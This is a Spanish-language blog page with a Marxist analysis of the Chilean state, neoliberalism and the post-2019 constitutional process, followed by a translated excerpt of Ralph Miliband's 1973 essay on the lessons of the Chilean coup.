Ya en el siglo XVII surge el Estado Capitalista, donde la llamada burguesía explota a los obreros, a la clase trabajadora y otras capas. En ese proceso de formación del Estado se fue generando un poder público especial con su ejército, con su policía, sus cárceles e instituciones coercitivas de distinto género. Eso ha sido el desarrollo del Estados hasta nuestros días. El Estado capitalista, ya presente hace un par de siglos, se puede manifestar de diversas maneras para ejercer su poder. Si nos referimos a sistemas de gobierno, la forma más generalizada hoy en día es la República, sea presidencialista o parlamentaria, federal o unitaria, democracia o dictadura, etcétera. Sin embargo, en todas ellas prima el ejercicio del poder, en diversas formas y grados, de la clase dominante sobre la clase dominada. Acorde a ello, se crean entonces las diferentes estructuras necesarias para ello.

En efecto, el Estado capitalista opera generalmente a través de instituciones, agrupadas en tres instancias: los clásicos poderes ejecutivo, legislativo y judicial (esa sepación en los tres poderes del Estado es lo que se conoce o denomina generalmente como Estado de Derecho, pero sin perjuicio de aquello en general predomina el poder ejecutivo). Si se preguntase cuál es la dirección del Estado, en qué calle se ubica, las respuestas serían diversas. En primer lugar, se debería señalar que ese concepto es abastracto, el Estado no tiene un lugar físico. Es precisamente un concepto.

Ahora bien, ¿qué expresa?.

Como ya se ha señalado, es la forma cómo un grupo, una clase social se impone sobre otro grupo, sobre otra clase social.

¿Cómo se impone?:

Junto con poseer un grupo especializado, como la fuerza pública (FF.AA. y policía), tiene la potestad de gravar con obligaciones pecunarias (cobrar impuestos) a diversos actores del quehacer nacional (en nuestro país, a través del SII y de la Tesorería General de la República, entre otros). Dicta leyes jurídicas que norman una infindad de asuntos e impone una serie de otras obligaciones y regulaciones en diversos ámbitos. Para todo esto actúa con varias instituciones.

Como Gobierno (Ejecutivo) actúa con la Presidencia, ministerios y numerosas otras instituciones gubernamentales; como Parlamento con la Cámara de Diputados y de Senadores; como Justicia a través de diversos tribunales e instancias, y también con otras instituciones estatales autónomas, como la Contraloría, el BCCH, etcétera, a través de las cuales ejerce sus atribuciones y la imposición de las leyes, entre otras potestades.

Lo señalado anteriormente es lo que constituye la denominada “Superestructura de la sociedad”, es decir, cómo se ordena el Estado. Pero éste se sustenta en la producción de bienes y servicio que logre generar, en cómo establece las relaciones de producción. Esto último se denomina la base material de la sociedad. En ella se encuentran las recién citadas relaciones de producción, particularmente las relaciones de propiedad sobre los Medios de Producción y sobre el producto, y otras. En un Estado capitalista, como es el nuestro, las relaciones de propiedad señalan que hay propiedad privada sobre los medios de producción y sobre el producto.

Por otro lado, están las Fuerzas Productivas (FFPP), las que incluyen particularmente la fuerza laboral (los trabajadores), maquinarias y otros. La interacción entre las FFPP y las relaciones de producción (RRPP) constituyen el llamado Modo de Producción. En la actualidad, tenemos un Modo de Producción Capitalista. Su esencia consiste en producir mercancías y generar plusvalía. Como ya se ha señalado, el Estado capitalista, que rige el Modo Capitalista de Producción, se manifiesta de diversas formas en su superestructura política, como República, monarquías, etcétera, lo que se expresa a su vez en diferentes regímenes de gobierno. En ese contexto, se rigen por las llamadas Constituciones Políticas. Se puede resumir que el Estado capitalista tiene como principal objetivo mantener el status quo, es decir, garantizar el poder de la clase dominante sobre la clase dominada, independientemente que ese poder se ejerza con algunos ribetes más represivos o más “democráticos”, dependiendo de la correlación de fuerzas que exista en cada momento, del estado de ánimo y grado de combatividad de la población, etcétera, pero nunca perderá su carácter de clase. Ello en directa relación con el tipo de gobierno que se establezca.

El Estado actual, con las instituciones estatales que correspondan, cumple diversas funciones. Quizás la más importante, a través de FF.AA. y policía, es mantener la seguridad nacional frente a otros Estados y la llamada seguridad interna. Asimismo debe cumplir una labor social respecto a asegurarle a la población una situación socioeconómica mínima. Por otra parte, debe brindar salud pública, educación pública, previsión social, vivienda, entre otras áreas. También debe realizar ciertas funciones económicas, sean éstas en forma directa, indirecta o mixta. Por ejemplo, el Estado puede poseer empresas productivas de bienes y/o servicios (por ejemplo, en Chile CODELCO, ENAP, el Metro, Banco Estado y otras), puede tener empresas mixtas asociado con capitales privados (nacionales o extranjeros), y también participa en forma indirecta en la economía nacional, sea mediante fijación de precios al consumidor, regulación del crédito y de la tasa de interés, diversas otras regulaciones, políticas tributarias, etcétera. Por lo mismo, a través del Ejecutivo, y considerando los aspectos legales regidos o determinados por o con el Legislativo y la aplicación de las leyes vigentes a través del Poder Judicial, puede el Estado participar de la actividad económica, aplicando para aquello un determinado modelo económico, por ejemplo, el Neoliberalismo en el caso nuestro.

Ahora bien, ¿qué es el neoliberalismo?.

En forma simple y concreta, es un modelo económico que privilegia los mecanismos de mercado para una actividad económica supuestamente equilibrada, otrorgándole al Estado solo un rol subsidiario, el cual consiste, en términos simples, en que el Estado debe asumir responsabilidades en aquellas áreas que no son rentables para los privados. Este modelo se impone en Chile desde mediados de los años 70, por presión del FMI y la aplicación de la llamada terapia de schok en nuestra economía. Reemplaza en varios países el anterior modelo Keynesiano. La implementación de uno u otro modelo está de acuerdo a la visión que tenga la clase dirigente para concebir y llevar adelante la gestión económica en el país en un momento dado. Derivado de ello puede aplicar el modelo económico que estime conveniente.

Siendo nuestro país una República marcadamente de régimen presidencial, es el Ejecutivo quién establece ese modelo económico neoliberal de acuerdo a la Constitución y leyes que rigen en el país en un momento determinado. Respecto al término Constitución Política, se puede señalar que ya en la antigüedad hay atisbos de este concepto, pero recién hace unos mil años atrás se conocen textos más generales al respecto (Inglaterra 1215 y otros reinos de la época), pero solo con las revoluciones burguesas y la irrupción del capitalismo toma el cariz actual. En ellas se establece el ya citado “estado de derecho” con la consiguiente división de poderes, cuyo fin único es establecer un cuerpo de leyes jurídicas bajo el marco de la Constitución, con el cual se garantizan los derechos de las personas y se establece un marco de funcionamiento, el que debiese ser respetado por todos, alcanzando así una “democracia”, la que en última instancia está al servicio de la clase dominante en desmedro de la clase oprimida. Su grado de libertades estará en directa relación con el tipo de gobierno que se establezca. No debemos olvidar que la actual Constitución chilena fue escrita bajo la dictadura más sangrienta y brutal que se haya dado en Chile, férrea defensora del neoliberalismo y del gran empresariado. La anterior a ella fue la Constitución de 1925, bajo la presidencia de Arturo Alessandri Palma, quién recién había asumido dicho cargo. Fue redactada por José Maza Fernández y aprobada en un plebiscito. Con ella se pasa de un sistema parlamentario a uno presidencial, donde la figura precisamente del Presidente pasa a ocupar un rol determinante en la toma de decisiones gubernamentales. El golpe de Estado de 1973 prácticamente termina con ello. Los primeros años la dictadura gobierna en base a Decretos Leyes.

El DL N° 16 de la Junta Militar de Chile, del 11 de septiembre de 1973, en su artículo 1, señala:

“Con esta fecha se constituyen en Junta de Gobierno y asumen el Mando Supremo de la Nación, con el patriótico compromiso de restaurar la chilenidad, la justicia y la institucionalidad quebrantadas, conscientes de que ésta es la única forma de ser fieles a las tradiciones nacionales, al legado de los Padres de la Patria y a la Historia de Chile, y de permitir que la evolución y el progreso del país se encaucen vigorosamente por los caminos que la dinámica de los tiempos actuales exigen a Chile en el concierto de la comunidad internacional de que forma parte».

Como este DL, los otros cientos de ellos están en la misma dirección de entregar a las FF.AA. y Policía todo el poder, como una forma extrema de la burguesía de mantener a toda ultranza sus posiciones de dominio, especialmente el económico.

Después del golpe de estado se constituyó, en 1973, la llamada Comisión Ortúzar, la que elaboró un anteproyecto de Constitución, el que fue revisado y visado por el Consejo de Estado y por la Junta de Gobierno, plebiscitándose la nueva Constitución el 11 de septiembre de 1980, encontrándose hasta el día hoy vigente con algunas modificaciones posteriores.

La Constitución de 1980 mantiene sus elementos más esenciales (los llamados “candados”), los que debiesen ser erradicados en una nueva Constitución.

En el artículo 8 de esa Constitución de 1980 se señala: “Todo acto de persona o grupo destinado a propagar doctrinas que atenten contra la familia, propugnen la violencia o una concepción de la sociedad del Estado o del orden jurídico, de carácter totalitario o fundada en la lucha de clases, es ilícito y contrario al ordenamiento institucional de la República. Las organizaciones y los movimientos o partidos políticos que por sus fines o por la actividad de sus adherentes tiendan a esos objetivos, son inconstitucionales”

En su artículo 9 se lee:

“El terrorismo, en cualquiera de sus formas, es por esencia contrario a los derechos humanos. Una ley de quorum calificado determinará las conductas terroristas y su penalidad. Los responsables de estos delitos quedarán inhabilitados por el plazo de quince años para ejercer los empleos, funciones o actividades a que se refiere el inciso cuarto del artículo anterior, sin perjuicio de otras inhabilidades o de las que por mayor tiempo establezca la ley. No procederá respecto de estos delitos la amnistía ni el indulto, como tampoco la libertad provisional respecto de los procesados por ellos. Estos delitos serán considerados siempre comunes y no políticos para todos los efectos legales”.

Paradojalmente, la Constitución pinochetista borró de cuajo el “estado de derecho” burgués.

Como sabemos, el 25 de octubre del 2020, producto del estallido social de octubre de 2019 y meses siguientes, fue posible el Plebiscito que abrió la posibilidad de tener una nueva Constitución, cuyo proceso formal comienza con la elección de los constituyentes el 15 y 16 de mayo recién pasado. Teniendo en cuenta el tiempo transcurrido desde el 18 de octubre de 2019 hasta la fecha, se hace necesario cuestionarse una serie de cosas respecto a qué ha pasado en el país en este casi medio siglo, desde el golpe de estado de 1973. En particular, por una serie de fenómenos sociales y económicos que han tenido lugar en el país, con sus respectivos cuestionamientos, y en relación a los dogmas que se han instalado en nuestra sociedad.

Se puede señalar que, con el golpe, se instaló en nuestro país un “Estado Policiaco”. Este debe entenderse como la utilización de todas las herramientas lícitas o ilícitas, de que dispone el Estado en un momento dado, incluso que pasen a llevar su propio ordenamiento jurídico vigente, facultando a las FF.AA. y policía a ejercer un férreo control sobre los opositores al régimen, y el uso de diferentes medios de represión, aún sean los más violentos y letales, como cruentos golpes de estado. En ese contexto político, la Dictadura instaló el nuevo modelo económico neoliberal en el país, asesorado por Milton Friedmann, de la Escuela de Chicago y sus discípulos chilenos: los llamados “Chicagos Boys”. Durante las décadas pos-dictadura, si bien se implementaron algunas reformas menores, la esencia del modelo político y económico se mantuvo incólume, como también la superestructura política, llámese marco legal. Por años se mantuvieron los senadores designados, la inamovilidad de los Comandantes en Jefe de las FF.AA. y del General Director de Carabineros, el rol tutelar de las FF.AA. sobre la “seguridad nacional”, los quorum calificados, etcétera. La represión policíaca, si bien disminuyó en parte, independientemente del gobierno de turno, se aplicó permanentemente contra las protestas estudiantiles, sindicales, contra los pueblos originarios, especialmente contra los mapuches, inclusive con montajes y asesinatos.

Con el estallido social del 18 de octubre del año 2019, esta política se acentuó. El 20 de octubre de 2019, Piñera declaraba: «Estamos en guerra contra un enemigo poderoso, implacable, que no respeta a nada ni a nadie, que está dispuesto a usar la violencia y la delincuencia sin ningún límite, incluso cuando significa pérdidas de vidas humanas, que está dispuesto a quemar nuestros hospitales, nuestras estaciones del Metro, nuestros supermercados». El día anterior había declarado Zona de Emergencia para Santiago y horas más tarde se dictó toque de queda, medida que no se implementaba desde tiempos de la dictadura. Desde el estallido social, el gobierno envió al Congreso Nacional una serie de proyectos de ley, algunos de corte social y económico, y otros marcadamente represivos, aprobados con votos de algunos parlamentarios descolgados de la oposición. Entre ellos, está la denominada ley anti-saqueos, ley anti-encapuchados, entre otros.

Por otra parte, mediáticamente se hace hincapié en criminalizar al movimiento social, tratándolos de delincuentes, vándalos y otros epítetos, y se victimiza a personal de Carabineros atacados y heridos por esas “turbas de delincuentes”. Del mismo modo, la posición de gobierno alcanza niveles al más puro estilo pinochetista de negacionismo, rechazando todos los informes que han condenado la violación a los DDHH por parte de FF.AA. y policías, dándole todo su respaldo a estos organismos armados. Desde 1990, los acontecimientos muestran la casi total autonomía e impunidad con que actúan estas instituciones armadas y nunca han perdido el poder que obtuvieron bajo la dictadura, lo cual los transforman en un factor decisivo en la coyuntura política que atravesamos. El tema de la subordinación de las FF.AA. y Policía no ha sido parte de la discusión actual. No está en las demandas levantadas, mucho menos en la agenda de gobierno y pareciera que tampoco en parte la oposición. Es evidente que estos temas también debiesen ser parte de la discusión que se lleva a cabo en la Convención Constitucional, como recientemente se ha planteado.

El Estado, como lo hemos visto, en su condición de Capitalismo, seguirá contemplando la esencia del mismo: defender los intereses de la clase dominante. La forma cómo se logra avanzar en una mayor apertura democrática en la nueva Constitución dependerá de varios factores, especialmente de la correlación de fuerzas que se logre con la presión del movimiento social, con los acuerdos que lleguen los constituyentes progresistas y una serie de otros factores. Aún cuando se logren avances considerables en la nueva Constitución, lo más probable es que el actual Estado chileno no cambie radicalmente su esencia de clases. Pero eso no quita la necesidad que aspectos económico importantes sí sean considerados en esa nueva Constitución.Algunos de estos aspectos económicos debiesen ser: En la actual Constitución está previsto que “El Estado y sus organismos podrán desarrollar actividades empresariales o participar en ellas sólo si una ley de quorum calificado los autoriza” (artículo 21). A todos luces esto es una gran aberración ya que es una traba para impedir que el Estado asuma responsabilidades empresariales, especialmente en aquellas áreas estratégicas de la economía del país, como, por ejemplo, en los recursos naturales no renovables, en energía y servicios de utilidad pública y áreas de la seguridad nacional, entre otros.

Por lo mismo, eso debiese ser derogado.

Otro punto impostergable es asegurar y garantizar actividades económicas sustentables con el medio ambiente, con la naturaleza. En este mismo contexto, no solo debe estar asegurada, por la nueva Constitución, la propiedad estatal sobre todos los recursos y riquezas naturales, sean de superficie, subsuelo o marítimos, sino que también se debe establecer un Royalty adecuado sobre ellos, ante la eventualidad de conceder su explotación a privados. Lo mismo sobre los recursos hídricos y sus reservas.

En el ámbito financiero, se debiese revisar el rol del Banco Central de Chile, en especial su carácter de autónomo. Un Estado más democrático, aún cuando se mantenga su condición de Estado capitalista, necesita generar una política de financiamiento, una política monetaria que vaya en beneficio de las grandes mayorías, particularmente en la emisión de dinero, la fijación de la tasa de interés y asegurar el acceso al crédito en condiciones no usureras, especialmente de las pequeñas empresas y de los consumidores, por lo que necesariamente debe generar políticas monetarias estrechamente ligadas y acorde a las políticas fiscales del Ministerio de Hacienda. Lo mismo respecto a las políticas de comercio exterior, el mercado cambiario y el tipo de cambio.

La concepción monetarista de la economía, sustentada por el Modelo Neoliberal vigente, se ha demostrado fracasada para solucionar los problemas de fondo de nuestro país.

Otro aspecto importante a considerar es revisar la estructura y las políticas tributarias, materias todas del Ministerio de Hacienda, en el sentido de establecer claramente el sujeto y objeto tributario, particularmente en lo que respecta al Impuesto a la Renta Primera y Segunda Categoría, y los regímenes especiales de tributación de las micro y pequeñas empresas, zonas francas y zonas extremas, etcétera.

Se trata de gravar con un concepto de justicia social, en el sentido que tributen aquellos que más tienen y aporten menos los sectores más desposeídos. Por ejemplo, volver al Impuesto Patrimonial, vigente hasta 1973 y ahora como proyecto de ley en el Congreso, modificar los impuestos indirectos, como el IVA y diferentes impuestos específicos, disminuir el gasto en Defensa, entre otros.

Para establecer derechos sociales (a la salud, a la previsión, a la vivienda, a la educación, etcétera.), el Estado debe contar con los fondos necesarios para eso, además de proveer fondos para cubrir el gasto corriente del Estado. La principal y más importante fuente de financiamiento con que cuenta el Estado son precisamente los impuestos, por lo mismo, debe haber una reforma tributaria que considere de verdad criterios redistributivos de justicia social.

Quizás un último elemento que se pueda resaltar es que la nueva Constitución debiese considerar constitucionalmente la independencia y soberanía del Estado chileno respecto a los diversos mecanismos internacionales, donde Chile participa, especialmente en lo referente a los diversos tratados y acuerdos internacionales que generalmente imponen obligaciones, las que mayoritariamente son perjudiciales para el país.

La nueva Constitución debe dejar sin efecto la nefasta Constitución pinochetista, lo que ya es enormemente positivo, y así permitirá avanzar en la democratización de nuestro país, pero no cambiará el carácter de clase del Estado.

Para avanzar en esa democratización se hace necesario que todas las fuerzas democráticas del país y, en especial, los constituyentes, logren generar la unidad más amplia posible, el mayor acuerdo para que, efectivamente, se pueda avanzar en ese camino

68 comentarios

Lecciones Permanentes del Golpe de Estado en Chile

Publicada el 24/10/2021 - 20/10/2021 por Anonymous Chile

El siguiente ensayo de Ralph Miliband, fue publicado en octubre de 1973, cuando aún humeaban los restos de La Modeda, y las fuerzas militares y civiles responsables del golpe estaban entregados a una criminal furia represiva. A pesar del tiempo transcurrido, y de afirmaciones con las que de puede discrepar, lectura es de extrema utilidad, por la vigencia de las lecciones que extrae del golpe de Estado en Chile, y de las condiciones que lo tornaron inevitable.

El golpe de Estado en Chile

Aunque la experiencia chilena puede no haber sido un test válido de transición al socialismo, todavía ofrece un ejemplo muy sugerente de lo que puede ocurrir cuando un gobierno intenta, en una democracia burguesa, realizar transformaciones verdaderamente serias en el orden social.

Lo ocurrido en Chile el 11 de septiembre de 1973 no reveló súbitamente nada nuevo acerca de las maneras en que los poderosos y los privilegiados buscan proteger su orden social: la historia de los últimos 150 años está salpicada de tales episodios.

Aun así, Chile ha obligado a mucha gente de izquierda a reflexionar y a hacerse algunas incómodas preguntas en relación con la “estrategia” más adecuada en los regímenes de tipo occidental para lo que de un modo algo vago se ha llamado “transición al socialismo”.

Por supuesto, los Hombres Sensatos de la Izquierda, y otros también, se han apresurado a proclamar que Chile no es Francia, o Italia, o Gran Bretaña. Esto es totalmente cierto. No existe un país igual a otro: las circunstancias son siempre diferentes, no solo entre un país y otro, sino entre distintos períodos dentro de un mismo país. Este sabio juicio hace posible y plausible argumentar que la experiencia de un país o un período no puede ofrecer “lecciones” concluyentes.

Eso también es cierto, y como principio general se debiera desconfiar de aquellos que instantáneamente formulan “lecciones” para cada ocasión. Lo más probable es que ya las tuvieran mucho antes, y solo intentan acomodar la nueva experiencia a sus ideas previas. Así es que seamos cuidadosos con aceptar o dar “lecciones”.

En todo caso, y aun siendo cuidadosos, hay cosas que aprender de la experiencia, o desaprender, lo que viene a ser lo mismo. Se decía, con mucha razón, que solo Chile, en Latinoamérica, era una sociedad pluralista, liberal, constitucional, parlamentaria, y un país que tenía política: no exactamente como los franceses, los estadounidenses o los británicos, pero que definitivamente existía dentro de un marco “democrático”, o, como dirían los marxistas, de la “democracia burguesa”.

Siendo este el caso, y con todo lo cuidadoso que uno quiera ser, lo ocurrido en Chile plantea ciertas preguntas, requiere ciertas respuestas, y puede incluso servir de recordatorio y advertencia.

Puede sugerir, por ejemplo, que los estadios que permiten otros usos además del deporte –como albergar a prisioneros políticos de izquierda– existen no solo en Santiago, sino en Roma y París, o también en Londres; o que debe haber algo errado en el hecho de que Marxism Today, la revista mensual “teórica y de discusión” del Partido Comunista británico, traiga como artículo principal de la edición de septiembre de 1973 un discurso pronunciado en julio por el secretario general del Partido Comunista chileno, Luis Corvalán (actualmente en prisión en espera de juicio y una eventual ejecución), que se titula “¡No a la guerra civil! Pero estamos preparados para aplastar la sedición”.

A la luz de lo ocurrido, esa respetable consigna luce patética e insinúa que algo anda muy mal aquí, algo que se debe evaluar para tratar de ver las cosas más claramente.

Puesto que Chile era una democracia burguesa, lo que ocurrió allí tiene que ver con la democracia burguesa, y con lo que puede también ocurrir en otras democracias burguesas. Después de todo, a la mañana siguiente del golpe The Times escribía (y la gente de izquierda debería memorizar cuidadosamente estas palabras): “… hayan o no las Fuerzas Armadas hecho lo correcto al actuar del modo en que han actuado, las circunstancias eran tales que cualquier militar razonable puede de buena fe haber pensado que era su deber constitucional intervenir”.

Si un episodio similar ocurriese en Gran Bretaña, no es descabellado pensar que quienquiera que esté dentro del estadio Wembley no será el editor del Times: él estará ocupado escribiendo editoriales lamentando esto y lo otro, pero coincidiendo, aunque de mala gana, en que tomadas en cuenta todas las circunstancias, y a pesar de la naturaleza angustiosa de la elección, no había alternativa sino la de un militar razonable que de buena fe puede haber pensado que era su deber… etcétera.


Daniel Céspedes, “un sospechoso izquierdista”, en el Estadio Nacional de Santiago. David Burnett

Cuando Salvador Allende fue elegido Presidente de Chile en septiembre de 1970, se dijo que el régimen que se inauguraba en ese momento constituiría un experimento de transición pacífica o parlamentaria al socialismo. Tal y como resultaron los siguientes tres años, fue una afirmación exagerada.

El gobierno de la UP avanzó mucho en cuanto a reformas económicas y sociales, y bajo condiciones increíblemente adversas, pero se mantuvo como un régimen deliberadamente “moderado”: de hecho, no parece exagerado decir que la causa de su destrucción, o al menos una causa importante, fue su obstinada “moderación”.

Pero no, ahora nos dicen los expertos, como el profesor Hugh Thomas, de la Escuela de Estudios Europeos Contemporáneos de la Universidad de Reading: el problema fue que Allende estaba muy influenciado por figuras como Marx o Lenin, “más que por Mill, Tawney o Aneurin Bevan, o cualquier otro socialista democrático europeo”.

Siendo este el caso, continúa animadamente el profesor Thomas, “el golpe de Estado en Chile de ninguna manera puede considerarse una derrota para el socialismo democrático, sino para el socialismo marxista”.

Todo está bien, entonces, por lo menos para el socialismo democrático. Eso sí, “no hay duda de que el doctor Allende tenía el corazón bien puesto”, debemos ser justos en esto; pero “hay muchas razones para pensar que su receta era la equivocada para los males del país, y por supuesto el resultado de tratar de aplicarla puede haber conducido a un cirujano de hierro a hacerse cargo. La receta correcta, por supuesto, era el socialismo keynesiano, no marxista”.

Ahí está: el problema con Allende es que no era Harold Wilson, rodeado de consejeros imbuidos del socialismo keynesiano, como el mismo profesor Thomas obviamente lo está.

No debemos quedarnos en los thomases de este mundo y sus opiniones preconcebidas acerca de las políticas de Allende. Pero, aunque la experiencia chilena puede no haber sido un test válido para la “transición pacífica al socialismo”, todavía ofrece un ejemplo muy sugerente de lo que puede ocurrir cuando un gobierno da la impresión, en una democracia burguesa, de que genuinamente intenta realizar transformaciones verdaderamente serias en el orden social, y moverse hacia el socialismo, de una manera no obstante gradual y constitucional; y cualquier cosa que pueda decirse sobre Allende y sus colaboradores, sobre sus estrategias y políticas, debe tomar en cuenta que es esto lo que pretendían hacer.

No eran, y sus enemigos lo sabían, meros políticos burgueses voceando consignas “socialistas”. No eran “socialistas keynesianos”. Eran personas serias y dedicadas, como muchos lo han demostrado muriendo por lo que creían.

Es esto lo que hace que la reacción conservadora se torne un asunto de gran interés e importancia, y por eso es necesario que tratemos de decodificar el mensaje, la advertencia, las “lecciones”. Porque la experiencia puede tener significados cruciales para otras democracias burguesas; de hecho, seguramente no hay necesidad de insistir en que una parte de esta experiencia repercutirá directamente en cualquier “modelo” de cambio social radical en el marco de este sistema político.

La lucha y la guerra

Quizás el mensaje, advertencia o “lección” más relevante es también el más obvio, y en consecuencia, el más fácilmente ignorado. Tiene que ver con la noción de lucha de clases. Suponiendo que dejamos de lado la visión de que la lucha de clases es resultado de la propaganda y agitación “extremistas”, queda el hecho de que la izquierda es más afín a la perspectiva según la cual la lucha de clases es un movimiento de los trabajadores y las clases subordinadas contra las clases dominantes.

Por supuesto, eso es. Pero la idea de lucha de clases también se refiere, y a menudo se refiere en primer lugar, a la lucha que libra la clase dominante, y el Estado actuando en su representación, en contra de los trabajadores y las clases subordinadas. Por definición, la lucha no es un proceso unidireccional; pero también es conveniente enfatizar que la clase o clases dominantes la promueven activamente, y en muchas maneras mucho más efectivamente que la batalla que libran las clases subordinadas.

En segundo lugar, pero en el mismo contexto, existe una enorme diferencia –tan grande que requiere un cambio de nombre– entre la lucha de clases “común”, del tipo que se ve día a día en las sociedades capitalistas, en los niveles económico, político, ideológico, micro y macro, y que se sabe que no constituye una amenaza para el marco capitalista en el que tiene lugar, y la lucha de clases que afecta, o se piensa que puede afectar, el orden social de un modo verdaderamente esencial.

La primera forma de lucha de clases constituye la sustancia, o gran parte de la sustancia, de la política en la sociedad capitalista. No es trivial, o una mera farsa; pero tampoco fuerza excesivamente el sistema político. La segunda forma habría que describirla no simplemente como lucha de clases sino como una guerra de clases.

Allí donde los poderosos y los privilegiados (y quienes tienen el máximo poder y privilegios no son necesariamente los más intransigentes) creen que enfrentan una amenaza real desde abajo, allí donde piensan que el mundo que conocen y que les gusta y que quieren preservar empieza a ser socavado y a ceder control a fuerzas malignas y subversivas, entonces una forma completamente diferente de lucha de clases entra en operación, una cuya agudeza, dimensiones y universalidad garantiza la etiqueta de “guerra de clases”.

Chile había conocido durante muchas décadas la lucha de clases dentro de un marco democrático burgués: esa era su tradición. Con la llegada al poder del Presidente Allende, progresivamente las fuerzas conservadoras transformaron la lucha de clases en una guerra de clases; y aquí también vale la pena recalcar que fueron las fuerzas conservadoras las que llevaron adelante este proceso.

Antes de detenerme en este tema, quisiera abordar un asunto que a menudo se plantea en relación con la experiencia chilena. Concretamente, la cuestión de los porcentajes electorales. Con frecuencia se ha dicho que Allende, candidato presidencial de una coalición de seis partidos, solo obtuvo el 36% de los votos en septiembre de 1970, implicando de esta manera que si hubiese obtenido, digamos, 51% de los votos, la actitud de las fuerzas conservadoras hacia él y su gobierno hubiese sido muy diferente. En un sentido puede ser cierto; pero en otro sentido me parece un peligroso disparate.

Tomando este último primero: uno de los más reconocidos expertos franceses en Latinoamérica, Marcel Niedergang, ha publicado un documento que es relevante en este tema. Se trata del testimonio de Joan Garcés, uno de los asesores cercanos de Allende por más de tres años, quien, bajo las órdenes directas del Presidente, escapó del Palacio de La Moneda el 11 de septiembre.

En la visión de Garcés, fue precisamente después de que la coalición de gobierno incrementase su porcentaje electoral a 44% en las elecciones legislativas de marzo de 1973 que las fuerzas conservadoras comenzaron a pensar seriamente en un golpe de Estado. “Tras las elecciones de marzo –dice Garcés–, un golpe de Estado por la vía legal ya no era viable, ya que no sería posible alcanzar la mayoría de dos tercios requerida para destituir constitucionalmente al Presidente. Entonces la derecha entendió que la vía electoral estaba agotada y que el único camino posible era el de la fuerza”.

Lo ha confirmado uno de los principales promotores del golpe, el general de la Fuerza Aérea Gustavo Leigh, quien declaró al corresponsal en Chile del Corriere della Sera que “iniciamos los preparativos para el derrocamiento de Allende en marzo de 1973, inmediatamente después de las elecciones parlamentarias”.

Tal evidencia no es concluyente, pero tiene mucho sentido. Escribiendo antes de que esta información estuviese disponible, Maurice Duverger dijo que, mientras Allende era apoyado por algo más de un tercio de los chilenos al comienzo de su mandato, tenía a casi la mitad de la población de su lado al momento del golpe; y esa mitad era la más afectada por las dificultades económicas. Él escribe:

«Esta es probablemente la principal razón para el golpe militar. Mientras la derecha chilena creyó que la experiencia de la Unidad Popular acabaría por voluntad de los electores, respetó el juego democrático. Valía la pena respetar la Constitución y esperar que pasara la tormenta. Pero cuando comenzó a temer que esta no pasaría y que el juego de las instituciones liberales resultaría en la permanencia de Allende en el poder y en el desarrollo del socialismo, prefirió la violencia a la ley».

Probablemente Duverger exagera la actitud democrática de la derecha y su respeto por la Constitución antes de las elecciones de marzo de 1973, pero su argumento principal parece muy sensato.

Y lo que implica es muy importante. A saber: en lo que respecta a las fuerzas conservadoras, los porcentajes electorales, sin importar lo altos que puedan ser, no le confieren legitimidad a un gobierno que les parece inclina do hacia políticas que ellas consideran efectiva o potencialmente desastrosas.

Tampoco es esto en absoluto extraordinario: porque a ojos de la derecha quienes están en el poder son demagogos viciosos, traidores de clase, locos, gánsteres y sinvergüenzas apoyados por una chusma ignorante, todos comprometidos en contribuir a la ruina y al caos de un país hasta ahora plácido y pacífico, etcétera.

El guión nos es familiar. Desde esa perspectiva, la idea de que los apoyos electorales tienen algún sentido es ingenua y absurda: lo que importa, para la derecha, no es el porcentaje de votos de un gobierno de izquierda, sino los objetivos por los que se mueve. Si los objetivos les parecen errados, profunda y verdaderamente errados, los porcentajes electorales les parecerán irrelevantes.

Sin embargo, existe un sentido en el que los porcentajes sí importan dentro del tipo de situación política que enfrenta la derecha en condiciones como las chilenas. Y es que mientras más altos son los porcentajes de votos obtenidos por la izquierda en cualquier elección, más probable es que las fuerzas conservadoras se sientan intimidadas, desmoralizadas, divididas e inseguras de su rumbo.

Estas fuerzas no son homogéneas; y es obvio que las demostraciones electorales de apoyo popular son muy útiles para la izquierda en su confrontación con la derecha, siempre que la izquierda no las considere decisivas.

En otras palabras, los porcentajes de apoyo pueden ayudar a intimidar a la derecha, pero no a desarmarla. Es muy posible que no se hubiese atrevido a atacar cuando lo hizo si Allende hubiese obtenido porcentajes electorales aun más altos. Pero si, habiendo obtenido este apoyo, hubiese persistido en el rumbo al cual se sentía inclinado, la derecha habría atacado en cualquier oportunidad que se le presentara. El asunto era negar- les la oportunidad; o, fallando esto, asegurar que la confrontación ocurriera en los términos más favorables que fuera posible.
La oposición

Ahora propongo volver a la cuestión de la lucha de clases y la guerra de clases, y a las fuerzas conservadoras que la desataron, con una referencia particular a Chile, aunque las consideraciones que ofrezco tienen una aplicación más amplia, por lo menos en lo que respecta a la naturaleza de las fuerzas conser- vadoras que deben tomarse en cuenta, y que examinaré una por una, relacionándolas con las formas de lucha en las que participan estas distintas fuerzas:

(a) La sociedad como campo de batalla

Hablar de “las fuerzas conservadoras”, como lo he hecho hasta aquí, no implica la existencia de un bloque económico, social o político homogéneo, ya sea en Chile o en cualquier otro lugar.

En Chile, entre otras cosas, fueron las divisiones entre elementos de las fuerzas conservadoras las que hicieron posible la llegada de Allende a la Presidencia. Aun así, y tomando debidamente en cuenta estas divisiones, es necesario recalcar que un aspecto decisivo de la lucha de clases lo acometen estas fuerzas como un todo, en el sentido de que la lucha ocurre en toda la “sociedad civil” y no tiene frente, ni un foco específico, ni una estrategia en particular, ni una organización o liderazgo elaborado: es la batalla diaria de cada miembro de las clases media y alta descontentas, cada uno a su manera, y también de buena parte de la clase media baja.

Se pelea desde un sentimiento que Evelyn Waugh expresara admirablemente cuando escribió en 1959, recordando los “horrores” del régimen de Attlee en Gran Bretaña después de 1945, que en aquellos años de gobierno laborista “el reino parecía estar bajo ocupación enemiga”.

La ocupación enemiga invita a varias formas de resistencia, y todo el mundo aporta con algo. Esa resistencia incluye a dueñas de casa de clase media manifestándose a través de caceroleos frente al palacio presidencial; dueños de fábricas saboteando la producción; comerciantes acaparando existencias; dueños de periódicos y sus subordinados desarrollando incesantes campañas en contra del gobierno; latifundistas impidiendo la reforma agraria; la difusión de lo que en Gran Bretaña durante la guerra se llamó “inquietud y pesimismo”, o “inquietud y desconcierto” (ciertamente sancionado por la ley): en pocas palabras, todo lo que la gente influyente, acomodada, educada (o no tan bien educada) puede hacer para obstaculizar un gobierno que detesta.

Tomado como una “totalidad no totalizada”, el daño que de este modo puede provocarse es muy considerable, y no he mencionado a los profesionales superiores, los médicos, los abogados, los funcionarios públicos, cuya capacidad para ralentizar el curso de una sociedad, de cualquier sociedad, debe reconocerse que es alta.

